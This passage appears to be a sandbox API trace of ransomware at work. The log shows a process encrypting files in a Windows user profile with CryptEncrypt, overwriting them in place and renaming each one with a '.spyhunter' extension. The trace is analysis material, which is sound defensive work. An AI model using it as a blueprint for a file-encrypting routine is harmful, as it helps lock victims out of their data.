(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.532] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0d0*=0x30) returned 1 [0141.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.536] GetProcessHeap () returned 0x2c0000 [0141.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.536] GetProcessHeap () returned 0x2c0000 [0141.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef77d8 | out: hHeap=0x2c0000) returned 1 [0141.536] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0d8 | out: pbBuffer=0x57f0d8) returned 1 [0141.536] GetProcessHeap () returned 0x2c0000 [0141.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.536] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0d0*=0x30) returned 1 [0141.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.538] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0141.538] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".txt") returned 0x0 [0141.538] GetProcessHeap () returned 0x2c0000 [0141.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.538] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f094, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f094*=0x6c8, lpOverlapped=0x0) returned 1 [0141.553] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.553] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x57f094, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f094*=0x6c8, lpOverlapped=0x0) returned 1 [0141.553] GetProcessHeap () returned 0x2c0000 [0141.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.553] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.553] WriteFile (in: hFile=0x184, lpBuffer=0x57f0d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f094, lpOverlapped=0x0 | out: lpBuffer=0x57f0d4*, lpNumberOfBytesWritten=0x57f094*=0x4, lpOverlapped=0x0) returned 1 [0141.554] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f094, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f094*=0x30, lpOverlapped=0x0) returned 1 [0141.554] CloseHandle (hObject=0x184) returned 1 [0141.563] GetProcessHeap () returned 0x2c0000 [0141.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f82de8 [0141.563] wnsprintfW (in: pszDest=0x2f82de8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.spyhunter") returned 123 [0141.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.spyhunter")) returned 1 [0141.563] GetProcessHeap () returned 0x2c0000 [0141.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82de8 | out: hHeap=0x2c0000) returned 1 [0141.563] GetProcessHeap () returned 0x2c0000 [0141.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.563] GetProcessHeap () returned 0x2c0000 [0141.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3003ba0 | out: hHeap=0x2c0000) returned 1 [0141.563] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0d0 | out: pbBuffer=0x57f0d0) returned 1 [0141.564] GetProcessHeap () returned 0x2c0000 [0141.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.564] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0c8*=0x30) returned 1 [0141.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.925] GetProcessHeap () returned 0x2c0000 [0141.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.925] GetProcessHeap () returned 0x2c0000 [0141.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7638 | out: hHeap=0x2c0000) returned 1 [0141.927] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0c8 | out: pbBuffer=0x57f0c8) returned 1 [0141.927] GetProcessHeap () returned 0x2c0000 [0141.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.927] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0c0*=0x30) returned 1 [0141.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.928] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0141.928] StrStrW (lpFirst="Settings.ini", lpSrch=".txt") returned 0x0 [0141.928] GetProcessHeap () returned 0x2c0000 [0141.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.928] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f084, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f084*=0x54, lpOverlapped=0x0) returned 1 [0141.930] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.930] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x57f084, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f084*=0x54, lpOverlapped=0x0) returned 1 [0141.930] GetProcessHeap () returned 0x2c0000 [0141.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.930] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.930] WriteFile (in: hFile=0x170, lpBuffer=0x57f0c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f084, lpOverlapped=0x0 | out: lpBuffer=0x57f0c4*, lpNumberOfBytesWritten=0x57f084*=0x4, lpOverlapped=0x0) returned 1 [0141.931] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f084, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f084*=0x30, lpOverlapped=0x0) returned 1 [0141.931] CloseHandle (hObject=0x170) returned 1 [0141.931] GetProcessHeap () returned 0x2c0000 [0141.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0141.931] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.spyhunter") returned 83 [0141.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.spyhunter")) returned 1 [0141.989] GetProcessHeap () returned 0x2c0000 [0141.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0141.989] GetProcessHeap () returned 0x2c0000 [0141.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.989] GetProcessHeap () returned 0x2c0000 [0141.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7c88 | out: hHeap=0x2c0000) returned 1 [0141.989] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0c0 | out: pbBuffer=0x57f0c0) returned 1 [0141.989] GetProcessHeap () returned 0x2c0000 [0141.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.989] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0b8*=0x30) returned 1 [0141.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0142.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0142.017] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0142.017] GetProcessHeap () returned 0x2c0000 [0142.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.018] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f07c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f07c*=0x104, lpOverlapped=0x0) returned 1 [0142.018] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.018] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x57f07c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f07c*=0x104, lpOverlapped=0x0) returned 1 [0142.019] GetProcessHeap () returned 0x2c0000 [0142.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.019] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.019] WriteFile (in: hFile=0xf4, lpBuffer=0x57f0bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f07c, lpOverlapped=0x0 | out: lpBuffer=0x57f0bc*, lpNumberOfBytesWritten=0x57f07c*=0x4, lpOverlapped=0x0) returned 1 [0142.019] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f07c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f07c*=0x30, lpOverlapped=0x0) returned 1 [0142.019] CloseHandle (hObject=0xf4) returned 1 [0142.019] GetProcessHeap () returned 0x2c0000 [0142.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.019] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter") returned 116 [0142.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.spyhunter")) returned 1 [0142.020] GetProcessHeap () returned 0x2c0000 [0142.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.020] GetProcessHeap () returned 0x2c0000 [0142.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.020] GetProcessHeap () returned 0x2c0000 [0142.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffae10 | out: hHeap=0x2c0000) returned 1 [0142.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0b8 | out: pbBuffer=0x57f0b8) returned 1 [0142.060] GetProcessHeap () returned 0x2c0000 [0142.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f0b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f0b0*=0x30) returned 1 [0142.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.144] GetProcessHeap () returned 0x2c0000 [0142.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.144] GetProcessHeap () returned 0x2c0000 [0142.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e538 | out: hHeap=0x2c0000) returned 1 [0142.146] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0b0 | out: pbBuffer=0x57f0b0) returned 1 [0142.146] GetProcessHeap () returned 0x2c0000 [0142.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.146] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f0a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f0a8*=0x30) returned 1 [0142.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.147] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0142.147] StrStrW (lpFirst="MSNBC News.url", lpSrch=".txt") returned 0x0 [0142.148] GetProcessHeap () returned 0x2c0000 [0142.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.148] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f06c*=0x85, lpOverlapped=0x0) returned 1 [0142.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.149] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f06c*=0x85, lpOverlapped=0x0) returned 1 [0142.149] GetProcessHeap () returned 0x2c0000 [0142.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.149] WriteFile (in: hFile=0x178, lpBuffer=0x57f0ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x57f0ac*, lpNumberOfBytesWritten=0x57f06c*=0x4, lpOverlapped=0x0) returned 1 [0142.149] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f06c*=0x30, lpOverlapped=0x0) returned 1 [0142.149] CloseHandle (hObject=0x178) returned 1 [0142.149] GetProcessHeap () returned 0x2c0000 [0142.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.150] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.spyhunter") returned 68 [0142.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.spyhunter")) returned 1 [0142.150] GetProcessHeap () returned 0x2c0000 [0142.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.150] GetProcessHeap () returned 0x2c0000 [0142.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.150] GetProcessHeap () returned 0x2c0000 [0142.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe968 | out: hHeap=0x2c0000) returned 1 [0142.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0b0 | out: pbBuffer=0x57f0b0) returned 1 [0142.151] GetProcessHeap () returned 0x2c0000 [0142.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.151] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f0a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f0a8*=0x30) returned 1 [0142.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.151] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0142.151] StrStrW (lpFirst="MSN.url", lpSrch=".txt") returned 0x0 [0142.151] GetProcessHeap () returned 0x2c0000 [0142.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.151] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f06c*=0x85, lpOverlapped=0x0) returned 1 [0142.152] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.152] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f06c*=0x85, lpOverlapped=0x0) returned 1 [0142.152] GetProcessHeap () returned 0x2c0000 [0142.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.152] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.152] WriteFile (in: hFile=0x178, lpBuffer=0x57f0ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x57f0ac*, lpNumberOfBytesWritten=0x57f06c*=0x4, lpOverlapped=0x0) returned 1 [0142.153] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f06c*=0x30, lpOverlapped=0x0) returned 1 [0142.153] CloseHandle (hObject=0x178) returned 1 [0142.153] GetProcessHeap () returned 0x2c0000 [0142.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.153] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.spyhunter") returned 61 [0142.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.spyhunter")) returned 1 [0142.153] GetProcessHeap () returned 0x2c0000 [0142.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.154] GetProcessHeap () returned 0x2c0000 [0142.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.154] GetProcessHeap () returned 0x2c0000 [0142.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c22070 | out: hHeap=0x2c0000) returned 1 [0142.154] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0a8 | out: pbBuffer=0x57f0a8) returned 1 [0142.154] GetProcessHeap () returned 0x2c0000 [0142.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.154] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f0a0*=0x30) returned 1 [0142.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.154] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0142.154] StrStrW (lpFirst="MSN Sports.url", lpSrch=".txt") returned 0x0 [0142.154] GetProcessHeap () returned 0x2c0000 [0142.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.154] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f064*=0x85, lpOverlapped=0x0) returned 1 [0142.155] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.155] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f064*=0x85, lpOverlapped=0x0) returned 1 [0142.155] GetProcessHeap () returned 0x2c0000 